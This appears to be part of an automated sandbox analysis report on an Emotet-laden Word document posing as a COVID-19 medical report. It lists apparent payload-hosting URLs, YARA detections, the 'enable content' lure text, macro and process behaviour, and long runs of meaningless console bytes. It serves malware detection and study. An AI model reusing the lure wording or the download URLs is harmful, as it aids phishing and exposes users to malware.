Source: powershell.exe, 00000005.00000002.2099206859.0000000002EA1000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2106741601.0000000003A69000.00000004.00000001.sdmp String found in binary or memory: http://vanddnabhargave.com/asset/W9o/
Source: rundll32.exe, 00000006.00000002.2111927523.0000000001E57000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2110821787.0000000002007000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2121763735.0000000002007000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2131595672.0000000002007000.00000002.00000001.sdmp, rundll32.exe, 0000000A.00000002.2146304517.0000000002197000.00000002.00000001.sdmp String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: powershell.exe, 00000005.00000002.2098069064.0000000002400000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2122352359.0000000002820000.00000002.00000001.sdmp String found in binary or memory: http://www.%s.comPA
Source: rundll32.exe, 00000006.00000002.2111782640.0000000001C70000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2110651832.0000000001E20000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2121577503.0000000001E20000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2131336460.0000000001E20000.00000002.00000001.sdmp String found in binary or memory: http://www.hotmail.com/oe
Source: rundll32.exe, 00000006.00000002.2111927523.0000000001E57000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2110821787.0000000002007000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2121763735.0000000002007000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2131595672.0000000002007000.00000002.00000001.sdmp, rundll32.exe, 0000000A.00000002.2146304517.0000000002197000.00000002.00000001.sdmp String found in binary or memory: http://www.icra.org/vocabulary/.
Source: powershell.exe, 00000005.00000002.2099206859.0000000002EA1000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2106741601.0000000003A69000.00000004.00000001.sdmp String found in binary or memory: http://www.letscompareonline.com/de.letscompareonline.com/wYd/
Source: rundll32.exe, 00000006.00000002.2111782640.0000000001C70000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2110651832.0000000001E20000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2121577503.0000000001E20000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2131336460.0000000001E20000.00000002.00000001.sdmp String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: powershell.exe, 00000005.00000002.2097432715.00000000003A5000.00000004.00000020.sdmp String found in binary or memory: http://www.piriform.com/ccleaner
Source: powershell.exe, 00000005.00000002.2097432715.00000000003A5000.00000004.00000020.sdmp String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/cclea7
Source: rundll32.exe, 00000009.00000002.2131336460.0000000001E20000.00000002.00000001.sdmp String found in binary or memory: http://www.windows.com/pctv.
Source: powershell.exe, 00000005.00000002.2106822436.0000000003B58000.00000004.00000001.sdmp String found in binary or memory: https://sectigo.com/CPS0D

E-Banking Fraud:

barindex
Yara detected Emotet
Source: Yara match File source: 00000008.00000002.2121216068.0000000000290000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2110577655.0000000000230000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2145222435.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2334223344.0000000000160000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2121359913.0000000000700000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2122851678.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2145232978.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2155705121.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2335867328.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2110590102.0000000000250000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2155718494.0000000000200000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2131220245.0000000000150000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2131240758.0000000000170000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2334238430.0000000000180000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2149683472.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2133987769.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2111395088.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2156224518.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 11.2.rundll32.exe.1d0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.10000000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.150000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.rundll32.exe.290000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.10000000.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.1c0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.200000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.rundll32.exe.10000000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.180000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.10000000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.1c0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.10000000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.rundll32.exe.250000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.rundll32.exe.10000000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.rundll32.exe.230000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.rundll32.exe.290000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.rundll32.exe.230000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.rundll32.exe.10000000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.10000000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.1a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.170000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.10000000.11.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.10000000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.rundll32.exe.700000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.150000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.180000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.200000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.1d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.160000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.170000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.1a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.rundll32.exe.250000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.rundll32.exe.700000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.10000000.12.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.rundll32.exe.10000000.12.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.160000.0.unpack, type: UNPACKEDPE

System Summary:

barindex
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 4 Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. 0 Page, I of I Words:
Source: Screenshot number: 4 Screenshot OCR: DOCUMENT IS PROTECTED. I Previewing is not available fOr protected documents. You have to press "E
Source: Screenshot number: 4 Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Screenshot number: 4 Screenshot OCR: ENABLE CONTENT" buttons to preview this document. 0 Page, I of I Words: 6,262 N@m 13 ;a 1009
Source: Document image extraction number: 0 Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 0 Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
Source: Document image extraction number: 0 Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Document image extraction number: 0 Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 1 Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document
Source: Document image extraction number: 1 Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available fOr protected documents. You have to press "ENA
Source: Document image extraction number: 1 Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Document image extraction number: 1 Screenshot OCR: ENABLE CONTENT" buttons to preview this document
Powershell drops PE file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\Nk2duhb\Gxlh9ia\E6_R.dll Jump to dropped file
Very long command line found
Source: unknown Process created: Commandline size = 5949
Source: unknown Process created: Commandline size = 5848
Source: C:\Windows\System32\cmd.exe Process created: Commandline size = 5848 Jump to behavior
Abnormal high CPU Usage
Source: C:\Windows\SysWOW64\rundll32.exe Process Stats: CPU usage > 98%
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Creates files inside the system directory
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Windows\SysWOW64\Dgmlr\ Jump to behavior
Detected potential crypto function
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1001B0D5 7_2_1001B0D5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1000DBB2 7_2_1000DBB2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10014602 7_2_10014602
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10002814 7_2_10002814
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1001821E 7_2_1001821E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10018A24 7_2_10018A24
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1001DA27 7_2_1001DA27
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1000A82A 7_2_1000A82A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1000B22A 7_2_1000B22A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1000422B 7_2_1000422B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1001A02C 7_2_1001A02C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1001A82C 7_2_1001A82C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1000E42E 7_2_1000E42E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1000BA46 7_2_1000BA46
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1000F249 7_2_1000F249
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10018C4D 7_2_10018C4D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1001505A 7_2_1001505A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10001662 7_2_10001662
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10001664 7_2_10001664
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1001D87D 7_2_1001D87D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10010082 7_2_10010082
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1001E689 7_2_1001E689
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10018489 7_2_10018489
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10002C93 7_2_10002C93
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10011494 7_2_10011494
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1000AE9E 7_2_1000AE9E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_100026A0 7_2_100026A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10008EA1 7_2_10008EA1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_100112B3 7_2_100112B3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1001E0B6 7_2_1001E0B6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1000BEBD 7_2_1000BEBD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_100048C7 7_2_100048C7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10004AD3 7_2_10004AD3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_100068D8 7_2_100068D8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_100084D8 7_2_100084D8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_100042DE 7_2_100042DE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1001E4E1 7_2_1001E4E1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10010CE0 7_2_10010CE0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_100038E1 7_2_100038E1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10012CE3 7_2_10012CE3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1001A2E5 7_2_1001A2E5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1000E8F6 7_2_1000E8F6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10001EF9 7_2_10001EF9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10006AFC 7_2_10006AFC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10007306 7_2_10007306
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1001CF07 7_2_1001CF07
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10003F0A 7_2_10003F0A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10013F16 7_2_10013F16
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10018721 7_2_10018721
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10019726 7_2_10019726
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1001C92D 7_2_1001C92D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1001732F 7_2_1001732F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1000D535 7_2_1000D535
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10016334 7_2_10016334
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10014D39 7_2_10014D39
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10003743 7_2_10003743
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1000F54C 7_2_1000F54C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1001894D 7_2_1001894D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10010950 7_2_10010950
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10011F54 7_2_10011F54
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1001CB58 7_2_1001CB58
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1001BF69 7_2_1001BF69
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10007B6A 7_2_10007B6A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1000A16A 7_2_1000A16A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10019D6D 7_2_10019D6D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1001197B 7_2_1001197B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1001DD80 7_2_1001DD80
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10017B8D 7_2_10017B8D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1001B598 7_2_1001B598
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1001539F 7_2_1001539F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1000799F 7_2_1000799F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1001E9A2 7_2_1001E9A2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1000EBA4 7_2_1000EBA4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_100021C0 7_2_100021C0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1001C1C2 7_2_1001C1C2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_100107D3 7_2_100107D3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_100095DD 7_2_100095DD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1001D5DF 7_2_1001D5DF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_100129E3 7_2_100129E3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1000F7EF 7_2_1000F7EF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_100033F4 7_2_100033F4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1000A7FA 7_2_1000A7FA
Document contains an embedded VBA macro which executes code when the document is opened / closed
Source: IU-8549 Medical report COVID-19.doc OLE, VBA macro line: Private Sub Document_open()
Source: VBA code instrumentation OLE, VBA macro: Module Sky5mdbfre3xe7q8, Function Document_open Name: Document_open
Document contains embedded VBA macros
Source: IU-8549 Medical report COVID-19.doc OLE indicator, VBA macros: true
Source: rundll32.exe, 00000006.00000002.2111782640.0000000001C70000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2110651832.0000000001E20000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2121577503.0000000001E20000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2131336460.0000000001E20000.00000002.00000001.sdmp Binary or memory string: .VBPud<_
Source: classification engine Classification label: mal100.troj.evad.winDOC@20/8@6/100
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\Desktop\~$-8549 Medical report COVID-19.doc Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\CVRBAD6.tmp Jump to behavior
Source: IU-8549 Medical report COVID-19.doc OLE indicator, Word Document stream: true
Source: IU-8549 Medical report COVID-19.doc OLE document summary: title field not present or empty
Source: IU-8549 Medical report COVID-19.doc OLE document summary: edited time not present or 0
Source: C:\Windows\System32\msg.exe Console Write: ........................................ .........................%.....H.%.............#...............................h.......5kU.......%..... Jump to behavior
Source: C:\Windows\System32\msg.exe Console Write: ................................A.s.y.n.c. .m.e.s.s.a.g.e. .s.e.n.t. .t.o. .s.e.s.s.i.o.n. .C.o.n.s.o.l.e.........%.....L.................%..... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................................................`I.........v.....................K........m............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.....................b.j......................v.............}..v....p.......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.....................b.j..... v...............v.............}..v............0.................m............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.....................c.j......................v.............}..v............0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.....................c.j....x.m...............v.............}..v....`.......0.................m............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....#...............Fc.j......................v.............}..v............0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....#...............Fc.j..... v...............v.............}..v............0...............H.m............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....7...............v..j....`Fm...............v.............}..v............0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....7..................j......................v.............}..v............0................Cm............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....C...............v..j....`Fm...............v.............}..v............0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....C..................j......................v.............}..v............0................Cm............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....O...............v..j....`Fm...............v.............}..v............0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....O..................j......................v.............}..v............0................Cm............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....[.......e.s. .a.r.e. .".S.s.l.3.,. .T.l.s."...".........}..v....0.......0................Cm.....(....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....[..................j......................v.............}..v....h.......0................Cm............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....g.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.4.6.7.............}..v....x.......0................Cm.....$....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....g..................j....0.................v.............}..v............0................Cm............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....s...............v..j....`Fm...............v.............}..v....x.......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....s..................j....0.................v.............}..v............0................Cm............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................v..j....`Fm...............v.............}..v....x.......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j....0.................v.............}..v............0................Cm............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................v..j....`Fm...............v.............}..v....x.......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j....0.................v.............}..v............0................Cm............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................v..j....`Fm...............v.............}..v....x.......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j....0.................v.............}..v............0................Cm............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................v..j....`Fm...............v.............}..v....x.......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j....0.................v.............}..v............0................Cm............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................v..j....`Fm...............v.............}..v....x.......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j....0.................v.............}..v............0................Cm............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................v..j....`Fm...............v.............}..v....x.......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j....0.................v.............}..v............0................Cm............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................v..j....`Fm...............v.............}..v....x.......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j....0.................v.............}..v............0................Cm............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................v..j....`Fm...............v.............}..v....x.......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j....0.................v.............}..v............0................Cm............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................v..j....`Fm...............v.............}..v....x.......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j....0 ................v.............}..v..... ......0................Cm............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................v..j....`Fm...............v.............}..v....x'......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j....0(................v.............}..v.....(......0................Cm............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................v..j....`Fm...............v.............}..v....x/......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j....00................v.............}..v.....0......0................Cm............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................v..j....`Fm...............v.............}..v....x7......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j....08................v.............}..v.....8......0................Cm............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................v..j....`Fm...............v.............}..v....x?......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j....0@................v.............}..v.....@......0................Cm............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................v..j....`Fm...............v.............}..v....xG......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j....0H................v.............}..v.....H......0................Cm............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....'...............v..j....`Fm...............v.............}..v....xO......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....'..................j....0P................v.............}..v.....P......0................Cm............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....3...............v..j....`Fm...............v.............}..v....xW......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....3..................j....0X................v.............}..v.....X......0................Cm............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....?...............v..j....`Fm...............v.............}..v....x_......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....?..................j....0`................v.............}..v.....`......0................Cm............................. Jump to behavior
